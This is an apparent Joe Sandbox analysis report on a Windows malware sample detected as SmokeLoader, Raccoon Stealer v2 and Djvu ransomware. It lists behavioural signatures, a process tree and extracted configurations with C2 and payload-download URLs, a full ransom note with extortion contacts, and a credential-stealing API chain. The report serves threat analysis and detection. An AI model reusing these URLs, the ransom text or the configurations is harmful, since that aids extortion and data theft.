Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5tLwjRFzAW.exe

Overview

General Information

Sample Name:5tLwjRFzAW.exe
Analysis ID:682150
MD5:203eaeca3c89f5ca7dc82668c4883b5a
SHA1:0d872229972ec1e3ea8173343a715b4a2fcb5855
SHA256:c4624241f0890dada47236f267303691f82bbbd28eed1a379a498bd3009cb734
Tags:exeFormbook
Infos:

Detection

CryptOne, Djvu, Raccoon Stealer v2, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected CryptOne packer
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Raccoon Stealer v2
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Tries to steal Crypto Currency Wallets
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Registers a DLL
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Extensive use of GetProcAddress (often used to hide API calls)
Uses cacls to modify the permissions of files
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • 5tLwjRFzAW.exe (PID: 5320 cmdline: "C:\Users\user\Desktop\5tLwjRFzAW.exe" MD5: 203EAECA3C89F5CA7DC82668C4883B5A)
    • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 28E9.exe (PID: 4384 cmdline: C:\Users\user\AppData\Local\Temp\28E9.exe MD5: FEEEAA3A0D766A6C52B71C23F796912D)
      • A658.exe (PID: 5244 cmdline: C:\Users\user\AppData\Local\Temp\A658.exe MD5: 1FDD74F600A1E3A9CFA80026CF54BC59)
        • A658.exe (PID: 4164 cmdline: C:\Users\user\AppData\Local\Temp\A658.exe MD5: 1FDD74F600A1E3A9CFA80026CF54BC59)
          • icacls.exe (PID: 3980 cmdline: icacls "C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)
          • A658.exe (PID: 2196 cmdline: "C:\Users\user\AppData\Local\Temp\A658.exe" --Admin IsNotAutoStart IsNotTask MD5: 1FDD74F600A1E3A9CFA80026CF54BC59)
      • regsvr32.exe (PID: 5148 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\D0E3.dll MD5: D78B75FC68247E8A63ACBA846182740E)
        • regsvr32.exe (PID: 2360 cmdline: /s C:\Users\user\AppData\Local\Temp\D0E3.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • E69F.exe (PID: 1436 cmdline: C:\Users\user\AppData\Local\Temp\E69F.exe MD5: 681D98300C552B8C470466D9E8328C8A)
      • 33.exe (PID: 4708 cmdline: C:\Users\user\AppData\Local\Temp\33.exe MD5: C9143FA5E2792724172980E5ACC312F0)
  • irbiwat (PID: 4748 cmdline: C:\Users\user\AppData\Roaming\irbiwat MD5: 203EAECA3C89F5CA7DC82668C4883B5A)
  • A658.exe (PID: 4276 cmdline: C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exe --Task MD5: 1FDD74F600A1E3A9CFA80026CF54BC59)
  • cleanup
{"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://acacaca.org/files/1/build3.exe"], "C2 url": "http://acacaca.org/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-HZpuxNJt6L\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0539Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwnRiilBAjbjg+cgYwCXm\\\\nLaNP5QQF5jdC1TW22Z8o0zYVtbrZekiKKm\\/dvjAJtmNxS5wAQztfiDKlgG8Ofj5b\\\\naSCJa8IVa2XFO\\/Rqe9VkZPw\\/7TKiloMMwH3cSLe\\/y4keVXUiXlBOt4U6IeHLB97Y\\\\nQ9bnyf17R+g5w+MHditFYY5TCx0N2kjHjEXYKQ2jf\\/qPj60AveoVelBM7u1xEZt8\\\\nLLlkG52MUE60Z7ZhS2zk5u2n5dFYwPW2oQTS5oeQxii5Y0IPHYAHk5hs3DoVfnE9\\\\n1Bo1oFeukX\\/4x5dzEqszXdLdVJXivjFzGcxQ3ZAOOkKu+6\\/+kHiS18x59NtWbYXT\\\\nMwIDAQAB\\\\n-----END PUBLIC KEY-----"}
{"C2 list": ["http://susuerulianita1.net/", "http://nikogminut88.at/", "http://cucumbetuturel4.com/", "http://lilisjjoer44.com/", "http://mini55tunul.com/", "http://limo00ruling.org/"]}
SourceRuleDescriptionAuthorStrings
00000011.00000002.343161421.00000000040E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000014.00000002.418605685.00000000004CC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
    0000001F.00000002.502148462.0000000004CD0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
      00000014.00000003.397574395.00000000004CC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
        00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
          Click to see the 56 entries
          SourceRuleDescriptionAuthorStrings
          20.3.28E9.exe.4d2d13.14.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
            20.3.28E9.exe.4d2d13.11.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
              20.3.28E9.exe.4d2d13.1.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
                20.3.28E9.exe.4d2d13.20.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
                  20.3.28E9.exe.4d2d13.11.raw.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
                    Click to see the 78 entries
                    No Sigma rule has matched
                    Timestamp:192.168.2.345.138.74.10449759802036934 08/11/22-06:53:10.741012
                    SID:2036934
                    Source Port:49759
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:45.138.74.104192.168.2.380497592036955 08/11/22-06:53:11.296973
                    SID:2036955
                    Source Port:80
                    Destination Port:49759
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://limo00ruling.org/URL Reputation: Label: malware
                    Source: http://acacaca.org/lancer/get.phpAvira URL Cloud: Label: malware
                    Source: http://85.192.63.46/f/1.exeAvira URL Cloud: Label: malware
                    Source: http://susuerulianita1.net/URL Reputation: Label: malware
                    Source: http://linislominyt11.at/URL Reputation: Label: malware
                    Source: http://62.204.41.178/newfile.exeAvira URL Cloud: Label: malware
                    Source: http://nikogminut88.at/URL Reputation: Label: malware
                    Source: http://acacaca.org/lancer/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806CAvira URL Cloud: Label: malware
                    Source: C:\Users\user\AppData\Local\Temp\E69F.exeAvira: detection malicious, Label: TR/AD.RaccoonSteal.muash
                    Source: C:\Users\user\AppData\Local\Temp\D0E3.dllAvira: detection malicious, Label: HEUR/AGEN.1233360
                    Source: monsutiur4.comVirustotal: Detection: 18%Perma Link
                    Source: rgyui.topVirustotal: Detection: 21%Perma Link
                    Source: linislominyt11.atVirustotal: Detection: 15%Perma Link
                    Source: acacaca.orgVirustotal: Detection: 18%Perma Link
                    Source: moroitomo4.netVirustotal: Detection: 14%Perma Link
                    Source: cucumbetuturel4.comVirustotal: Detection: 15%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeReversingLabs: Detection: 80%
                    Source: C:\Users\user\AppData\Local\Temp\33.exeReversingLabs: Detection: 22%
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeMetadefender: Detection: 47%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeReversingLabs: Detection: 56%
                    Source: 5tLwjRFzAW.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\irbiwatJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\D0E3.dllJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exeJoe Sandbox ML: detected
                    Source: 31.2.regsvr32.exe.4cd0184.1.unpackAvira: Label: TR/Kazy.4159236
                    Source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://susuerulianita1.net/", "http://nikogminut88.at/", "http://cucumbetuturel4.com/", "http://lilisjjoer44.com/", "http://mini55tunul.com/", "http://limo00ruling.org/"]}
                    Source: 27.2.A658.exe.23415a0.1.raw.unpackMalware Configuration Extractor: Djvu {"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://acacaca.org/files/1/build3.exe"], "C2 url": "http://acacaca.org/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-HZpuxNJt6L\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0539Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00403236 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_004027B8 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00402CB8 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,CopyFileW,CopyFileW,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,CryptUnprotectData,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00406468 LocalAlloc,CryptStringToBinaryA,lstrlen,CryptStringToBinaryA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,StrCpyW,LocalFree,StrCpyW,StrCpyW,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_004017FA CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040177F CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,StrCpyW,LocalFree,LocalFree,

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeUnpacked PE file: 20.2.28E9.exe.400000.0.unpack
                    Source: 5tLwjRFzAW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49804 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49814 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49815 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49816 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49822 version: TLS 1.2
                    Source: Binary string: C:\cakap\zitagabizu\hiwefikomup18 da.pdb source: 28E9.exe, 00000014.00000000.366061081.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 28E9.exe.4.dr
                    Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: A658.exe, A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: freebl3.pdb source: freebl3.dll.20.dr
                    Source: Binary string: softokn3.pdbp source: softokn3.dll.20.dr
                    Source: Binary string: C:\juyirac\93 sadenisijona\maledi\57\vecukukey\danoxitujeya\xi.pdb source: A658.exe, 00000021.00000000.467498504.0000000000401000.00000020.00000001.01000000.00000011.sdmp, A658.exe, 00000027.00000000.481944104.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, A658.exe.4.dr, A658.exe.28.dr
                    Source: Binary string: FC:\cakap\zitagabizu\hiwefikomup18 da.pdb source: 28E9.exe, 00000014.00000000.366061081.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 28E9.exe.4.dr
                    Source: Binary string: mozglue.pdb@+ source: mozglue.dll.20.dr
                    Source: Binary string: ZC:\juyirac\93 sadenisijona\maledi\57\vecukukey\danoxitujeya\xi.pdb source: A658.exe, 00000021.00000000.467498504.0000000000401000.00000020.00000001.01000000.00000011.sdmp, A658.exe, 00000027.00000000.481944104.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, A658.exe.4.dr, A658.exe.28.dr
                    Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: nss3.pdb source: nss3.dll.20.dr
                    Source: Binary string: mozglue.pdb source: mozglue.dll.20.dr
                    Source: Binary string: \Downloads\Documents\f3iwnx51rxg\output.pdb source: 33.exe.4.dr
                    Source: Binary string: softokn3.pdb source: softokn3.dll.20.dr
                    Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.20.dr
                    Source: Binary string: C:\jid.pdb source: 5tLwjRFzAW.exe, irbiwat.4.dr
                    Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.20.dr
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040ABD8 LocalAlloc,LocalFree,LocalAlloc,GetLogicalDriveStringsW,GetLogicalDriveStringsW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040196E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00401B05 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040633E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW,
